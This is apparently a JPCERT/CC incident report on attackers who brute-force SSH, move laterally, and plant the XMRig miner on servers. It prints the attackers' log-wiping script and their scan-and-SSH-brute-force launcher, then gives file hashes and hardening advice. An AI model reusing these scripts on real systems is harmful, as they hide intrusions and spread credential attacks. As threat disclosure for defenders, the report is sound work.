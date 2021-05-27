Attacks Embedding XMRig on Compromised Servers
Publicly-accessible servers have been often targeted for attacks. In recent years, there are cases where these servers are compromised and embedded with a cryptocurrency mining tool. JPCERT/CC confirmed cases with XMRig [1] in February 2021. This article introduces the details of the cases and the tools used.
Initial access/Lateral movement
In one of the recent cases, the attacker made several attempts to access the server with SSH protocol, and eventually logged in with its root account. This server was reachable both from the Internet and intranet. After the intrusion, the attacker conducted SSH brute force attack to other servers on the intranet, moved laterally to several servers and ran a cryptocurrency mining tool XMRig. For its execution, XHide [2] was used to hide process names and delay the detection. Below are the tools found in compromised servers.
|
File name
|
Contents
|
init
|
XMRig, an open source mining software
|
system
|
bash script to repeatedly execute XMRig
|
h64
|
XHide, a process hiding tool
Here is the bash script to execute XMRig repeatedly:
#!/bin/bash
While `True`
do
./init
don
Defense evasion
After setting up the mining tool, the attacker deleted the evidence from the compromised servers by replacing the contents of the following logfile with /dev/null.
- /var/log/security
- /var/log/wtmp
- /var/log/btmp
- /var/log/utx.lastlog
- /var/log/utx.log
The attacker also used the script to delete rows that include specific string from each log file under /var/log. Below is a part of the bash script:
#!/bin/bash
echo " Linux Hider v2.0 by mave"
echo " enhanced by me! "
echo "[+] [Shkupi Logcleaner] Removing $1 from the logs........ ."
echo ""
if [ -f /var/log/maillog ]; then
cat /var/log/maillog | grep -v $1 > /tmp/maillog.xz
touch -acmr /var/log/maillog /tmp/maillog.xz
mv -f /tmp/maillog.xz /var/log/maillog
echo "[+] /var/log/maillog ... [done]"
echo ""
fi
（snipped)
rm -f /tmp/*.xz
echo " * m i s s i o n a c c o m p l i s h e d *"
echo ""
sleep 2
echo " p.h.e.e.r S.H.c.r.e.w"
echo ""
sleep 5
exit 1
Strings except the specific rows are saved in a file in .xz format. Its timestamp is modified, and the contents are overwritten in each log file. Finally, the .xz file is deleted so that there is no evidence of the malicious activity in the log file.
Spread infection
After embedding the mining tool and deleting the log file, the attackers sent a large number of packets to random hosts from the initially compromised server. Below are the tools used in the scanning activity. These are executed by the bash script named “root”, which is mentioned later.
|
File name
|
Contents
|
ps
|
Shark, a port scan tool [3]
|
ps2
|
A port scan tool
|
banner
|
A tool to access a specified host and extract banner information from the response
|
prg
|
A tool to read IP address and password list and conduct DDH brute force attacks
|
root
|
A bash script to conduct scan and SSH brute force
The attack script first conducts SYN scanning to check if a specific port is open. It also reads the banner information of the response from the host. If it is determined as a SSH server, SSH brute force is carried out. Below is the bash script:
#!/bin/bash
# PRGSSH v3.2 - 06/Sep/2018
# AUTHOR: PRG @ oldTeam
# ___________________________________________________
# | |
# | ###### ###### ###### ###### ###### ## ## |
# | ## ## ## ## ## ## ## ## ## |
# | ###### ###### ## ### ###### ###### ######## |
# | ## ## ## ## ## ## ## ## ## |
# | ## ## ## ###### ###### ###### ## ## |
# | |
# | VERSION 3.3 - 2018 |
# | CREATED BY PRG |
# | OLDTEAM |
# | FOR TESTING PURPOSES ONLY |
# |___________________________________________________|
#CONFIG
key=PRG-oldTeam # key for scanner ( DO NOT MODIFY )
mode=normal # normal or verbose mode (if you put <verbose>) it will show you print like: Check IP with user
port=3691 # port for bruteforce
uidThreads=500 # threads if you are uid0usrThreads=350 # threads if you are user
banThreads=250 # threads for banner grabber
psSpeed=10 # portscan speed
#END CONFIG
# MOTD
echo "let's see what happens";
# END MOTD
rm -rf bios.txt banner.log
sleep 5
if [[ $UID == 0 || $EUID == 0 ]]; then
echo -e "[+] uid0 detected "
./ps $port -a $1 -s $psSpeed
echo -e "[+] Banner grabber starting... "
sleep 3
./banner bios.txt $port $banThreads
cat banner.log |grep SSH-2.0-OpenSSH |awk '{print $1}' |uniq |shuf >> ips.lst
ipscount=`grep -c . ips.lst`
echo -e "[+] Found $ipscount possible victims "
sleep 10
./prg $uidThreads $port $mode $key
else
echo -e "[+] user detected "
./ps2 $1 $port
echo -e "[+] Banner grabber starting... "
sleep 1
./banner bios.txt $port $banThreads
sleep 3
cat banner.log |grep SSH-2.0-OpenSSH |awk '{print $1}' |uniq |shuf >> ips.lst
sleep 10
echo -e "[+] Start bruteforce attack... "
./prg $usrThreads $port $mode $key
fi
The flow of the attack is illustrated as follows. In the scan and SSH brute force attack to random IP addresses, there were many packets destined to port number 3691. The reason for this choice remains unknown.
Figure 1: Attack flow
In closing
This attack activities are carried out by leveraging existing available tools. Once the intranet is compromised, it is easy for attackers to move laterally across the network especially in the environment where weak username and password are used. The attack technique is nothing new, and the damage can be mitigated by configuring proper SSH access restrictions and SSH public key authentication. Please ensure these measures and watch out for similar malicious activity in the wild.
The hash values of the tools are available in Appendix A.
- Yuma Masubuchi, Kota Kino
(Translated by Yukako Uchida)
Reference
[1] XMRig
https://github.com/xmrig/xmrig
[2] HackTool.Linux.XHide.GA
https://www.trendmicro.com/vinfo/jp/threat-encyclopedia/malware/hacktool.linux.xhide.ga
[3] HKTL_SHARK.GA
https://www.trendmicro.com/vinfo/jp/threat-encyclopedia/malware/hktl_shark.ga
Appendix A Hash value of the tools
These hash values include tools which may also be used in daily operation. Beware of false detection when using this as an indicator of compromise.
- init
- fdfee2487f51446bf7bfb559b0b66de67cc5f6293752413435512ea8869df2e7
- systemd
- ce2d96e360efec9abde87fc26e666774cc92f02e0a4d2659f8afa7cbfdd0d072
- h64
- 7fe9d6d8b9390020862ca7dc9e69c1e2b676db5898e4bfad51d66250e9af3eaf
- ps
- d328ebb08f6002c6819ecb360a132809d6bed2b7cdea7d2bc6f4a2ce95b27e34
- ps2
- 14779e087a764063d260cafa5c2b93d7ed5e0d19783eeaea6abb12d17561949a
- banner
- 2ef26484ec9e70f9ba9273a9a7333af195fb35d410baf19055eacbfa157ef25
- prg
- 9970b53013dc9cdb23ec69b48743d75ece460d40ab51277d92e665c2dbb73c97
- root
- de1ebfaa849a89478ac101614b1275f5e1dda9bfd07697911fd8fa125edaf7c2